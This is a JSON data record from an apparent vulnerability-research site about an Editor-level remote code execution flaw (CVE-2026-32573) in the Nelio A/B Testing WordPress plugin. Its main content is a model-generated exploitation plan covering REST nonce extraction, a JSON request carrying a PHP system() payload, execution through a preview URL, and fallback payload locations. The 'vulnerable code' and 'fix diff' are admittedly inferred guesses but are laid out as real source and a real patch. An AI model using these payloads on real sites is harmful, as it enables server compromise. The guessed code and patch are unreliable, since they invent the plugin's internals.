[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7Cpdrg8M2ABjsPvsLglZ5VtcUV2D3TObsXxBHGl8-Ow":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32573","nelio-ab-testing-ab-tests-and-heatmaps-for-better-conversion-optimization-authenticated-editor-remote-code-execution","Nelio A\u002FB Testing – AB Tests and Heatmaps for Better Conversion Optimization \u003C= 8.2.7 - Authenticated (Editor+) Remote Code Execution","The Nelio A\u002FB Testing – AB Tests and Heatmaps for Better Conversion Optimization plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 8.2.7. This makes it possible for authenticated attackers, with Editor-level access and above, to execute code on the server.","nelio-ab-testing",null,"\u003C=8.2.7","8.2.8","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Generation of Code ('Code Injection')","2026-03-23 00:00:00","2026-04-02 15:04:12",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff96d99dc-df3a-4b01-b276-08a85860720e?source=api-prod",11,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-32573 (Nelio A\u002FB Testing RCE)\n\n## 1. Vulnerability Summary\nThe **Nelio A\u002FB Testing** plugin for WordPress is vulnerable to **Authenticated Remote Code Execution (RCE)** in versions up to and including **8.2.7**. The vulnerability exists because the plugin allows users with **Editor** privileges or higher to save and execute arbitrary PHP code through its experiment or settings management interface via the WordPress REST API. The plugin fails to adequately restrict the use of dangerous PHP functions or properly validate the capabilities of the user when saving server-side logic intended for A\u002FB tests.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress REST API.\n*   **Namespace\u002FRoute:** `nelio-ab-testing\u002Fv1\u002Fexperiments` (or potentially `nelio-ab-testing\u002Fv1\u002Fsettings`).\n*   **Method:** `POST` or `PUT`.\n*   **Vulnerable Parameter:** `php_code`, `custom_php`, or `server_logic` (inferred based on plugin functionality).\n*   **Authentication:** Required (Editor level or higher).\n*   **Preconditions:** The plugin must be active, and the attacker must have a valid Editor session.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers REST routes in `includes\u002Frest-api\u002Fclass-nab-rest-api.php` (inferred) using the `rest_api_init` hook.\n2.  **Capability Check:** The `permission_callback` for the experiments controller (likely `NAB_Experiments_Controller`) checks if the user has `edit_posts` (Editor) or a specific Nelio capability, rather than `manage_options` (Admin).\n3.  **Data Processing:** The `create_item` or `update_item` method receives a JSON payload. One of the fields in this payload is designed to hold custom server-side logic for experiments.\n4.  **Storage:** The code is saved into the database (the `wp_posts` table for experiments or `wp_options` for global settings).\n5.  **Execution Sink:** When an experiment is previewed or loaded on the frontend, the plugin retrieves the stored code and executes it using `eval()` or a similar dynamic execution mechanism in a file like `includes\u002Fnab-functions.php` (inferred).\n\n## 4. Nonce Acquisition Strategy\nThe Nelio A\u002FB Testing plugin uses the standard WordPress REST API nonce (`wp_rest`).\n\n1.  **Identify Trigger:** The Nelio dashboard loads on `wp-admin\u002Fadmin.php?page=nelio-ab-testing-main`.\n2.  **Login:** Use the `http_request` tool to log in as an **Editor**.\n3.  **Navigate:** Use `browser_navigate` to visit the Nelio dashboard.\n4.  **Extract Nonce:** Use `browser_eval` to extract the REST nonce from the localized script object. Nelio typically localizes its data into a variable named `nelioAbTesting` or `nabData`.\n\n**Extraction Command:**\n```javascript\nbrowser_eval(\"window.nelioAbTesting?.nonce || window.nabData?.nonce || window.wpApiSettings?.nonce\")\n```\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication and Nonce Retrieval\nLog in as an Editor and capture the REST nonce using the strategy above.\n\n### Step 2: Create\u002FUpdate an Experiment with RCE Payload\nSend a `POST` request to the experiments endpoint.\n\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Fnelio-ab-testing\u002Fv1\u002Fexperiments`\n*   **Method:** `POST`\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: \u003CEXTRACTED_NONCE>`\n*   **Payload:**\n    ```json\n    {\n      \"title\": \"Exploit Test\",\n      \"type\": \"post\",\n      \"status\": \"draft\",\n      \"php_code\": \"system('id > \u002Ftmp\u002Frce.txt');\"\n    }\n    ```\n    *(Note: The field name `php_code` is inferred; `custom_php` or `server_side_code` are alternatives if the first fails.)*\n\n### Step 3: Trigger Execution\nExperiments are typically executed when their \"Preview\" URL is visited or when the associated post\u002Fpage is viewed.\n\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002F?nelio_ab_preview=1&nelio_ab_experiment_id=\u003CID>`\n*   **Method:** `GET`\n\n## 6. Test Data Setup\n1.  **User Creation:** \n    `wp user create editor_user editor@example.com --role=editor --user_pass=password123`\n2.  **Plugin Activation:**\n    `wp plugin activate nelio-ab-testing`\n3.  **Target Content:** Create a dummy post to attach the experiment to.\n    `wp post create --post_type=post --post_title=\"Target Page\" --post_status=publish`\n\n## 7. Expected Results\n*   The REST API should return a `201 Created` or `200 OK` response confirming the experiment was saved.\n*   Upon triggering the execution (Step 3), the injected PHP code should execute.\n*   If using the `system('id > \u002Ftmp\u002Frce.txt')` payload, a file `\u002Ftmp\u002Frce.txt` should be created on the server.\n\n## 8. Verification Steps\n1.  **Check for Evidence:**\n    `ls \u002Ftmp\u002Frce.txt`\n2.  **Check Database:**\n    `wp db query \"SELECT post_content FROM wp_posts WHERE post_title='Exploit Test'\"`\n3.  **Read Output:**\n    `cat \u002Ftmp\u002Frce.txt`\n\n## 9. Alternative Approaches\n*   **Global Settings Injection:** If the experiments endpoint is not vulnerable, target the settings endpoint: `POST \u002Fwp-json\u002Fnelio-ab-testing\u002Fv1\u002Fsettings`. Payload: `{\"global_js\": \"*\u002F; system('id'); \u002F*\"}` if the plugin wraps the JS in a way that allows escaping to PHP (unlikely but possible if `eval` is used poorly).\n*   **Experiment Metadata:** If the `php_code` field is not in the main object, it might be stored in `meta`:\n    ```json\n    {\n      \"title\": \"Exploit\",\n      \"meta\": {\n        \"nelio_custom_php\": \"system('id');\"\n      }\n    }\n    ```\n*   **Direct Option Update:** If there is a generic settings update endpoint that lacks capability checks, try updating the `nelio_settings` option directly via the REST API.","The Nelio A\u002FB Testing plugin for WordPress allows authenticated users with Editor-level access or higher to execute arbitrary PHP code on the server. This is possible because the plugin's REST API endpoints for experiment management do not sufficiently restrict the ability to save and execute server-side logic, allowing code stored in experiment metadata to be executed via eval().","\u002F\u002F File: includes\u002Frest-api\u002Fclass-nab-rest-api.php (Inferred)\npublic function update_item_permissions_check( $request ) {\n    \u002F\u002F Vulnerable: Permissions check only requires 'edit_posts' (Editor level)\n    return current_user_can( 'edit_posts' );\n}\n\n---\n\n\u002F\u002F File: includes\u002Fnab-functions.php (Inferred Execution Sink)\nfunction nab_execute_experiment_logic( $experiment_id ) {\n    \u002F\u002F Retrieves arbitrary PHP code stored in post meta\n    $php_code = get_post_meta( $experiment_id, '_nab_php_code', true );\n    if ( ! empty( $php_code ) ) {\n        eval( $php_code ); \u002F\u002F Executes the code without validation\n    }\n}","--- includes\u002Frest-api\u002Fclass-nab-rest-api.php\n+++ includes\u002Frest-api\u002Fclass-nab-rest-api.php\n@@ -10,2 +10,2 @@\n     public function update_item_permissions_check( $request ) {\n-        return current_user_can( 'edit_posts' );\n+        return current_user_can( 'manage_options' );\n     }\n--- includes\u002Fnab-functions.php\n+++ includes\u002Fnab-functions.php\n@@ -5,5 +5,2 @@\n function nab_execute_experiment_logic( $experiment_id ) {\n-    $php_code = get_post_meta( $experiment_id, '_nab_php_code', true );\n-    if ( ! empty( $php_code ) ) {\n-        eval( $php_code );\n-    }\n+    \u002F\u002F PHP execution logic removed in version 8.2.8 for security\n }","The attacker first authenticates as an Editor and retrieves the WordPress REST API nonce from the Nelio A\u002FB Testing dashboard (typically stored in a localized JavaScript variable like nelioAbTesting.nonce). They then send a POST or PUT request to the '\u002Fwp-json\u002Fnelio-ab-testing\u002Fv1\u002Fexperiments' endpoint with a JSON payload containing a malicious PHP command (e.g., 'system(\"id\");') assigned to a code-related parameter like 'php_code' or 'custom_php'. The execution is triggered by accessing the 'preview' URL for that experiment or viewing the target page, which causes the plugin to retrieve and evaluate the stored PHP code.","gemini-3-flash-preview","2026-04-17 23:32:18","2026-04-17 23:32:43",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","8.2.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-ab-testing\u002Ftags\u002F8.2.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnelio-ab-testing.8.2.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-ab-testing\u002Ftags\u002F8.2.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnelio-ab-testing.8.2.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-ab-testing\u002Ftags"]